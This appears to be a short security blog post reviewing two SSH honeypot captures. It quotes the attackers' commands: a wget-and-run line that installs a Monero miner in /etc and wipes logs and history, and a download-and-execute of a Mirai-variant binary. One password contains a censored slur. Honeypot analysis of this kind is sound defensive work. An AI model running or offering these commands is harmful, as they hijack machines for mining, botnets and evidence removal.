Scanning for Scanners Update

It seems overnight I have gotten two honeypot bites, both from SMA (suckmyass) variants that I expected to be dead. Let’s see what they did, shall we?

138.36.██.██ connects with SSH-2.0-PuTTY_Release_0.70, user SSH2 and password Hacked12123.

ls
ls -a
uname -a
cat /proc/cpuinfo
wget http://167.88.███.██/m -O - > /etc/.0; chmod 777 /etc/.0; /etc/.0 -u 42bWPQ... -o pool.monero.hashvault.pro:5555 -p x -k -a cryptonight -B --donate-level=1 --max-cpu-usage=98; rm -rf nohup.out /var/log/lastlog; history -c

*I truncated that monero address, since it serves no purpose but to take up space.

Disconnected.

Seems they did this manually, judging by by their use of PuTTY. Didn’t quite make them money they expected, unfortunately!

Warning: There are some offensive passwords coming up, I’ll censor them but I’m sure you can work out what they are.

194.59.2██.███ connects with SSH-2.0-PuTTY_Release_0.70, user bigbots and password fatni██er123.

ls
cd
cd /
ls
lscpu
cd /root
ls
?
help

Disconnected.

194.59.2██.███ connects with SSH-2.0-WinSCP_release_5.13.3, user bigbots and password fatni██er123. Requests sftp subsystem, and then proceeds to disconnect.

194.59.2██.███ connects with SSH-2.0-PuTTY_Release_0.70, user bigbots and password fatni██er123.

ls
wget http://68.1██.██.██/x86███; chmod +x x86███; ./x86███ ssh

*This link is a mirai variant.

Disconnected.

Another seemingly manual operation, judging by their confusion ? and the use of SSH-2.0-PuTTY_Release_0.70. The dropper is on a DigitalOcean IP, so I don’t expect it to live much longer after a single abuse report.

That’s all for now.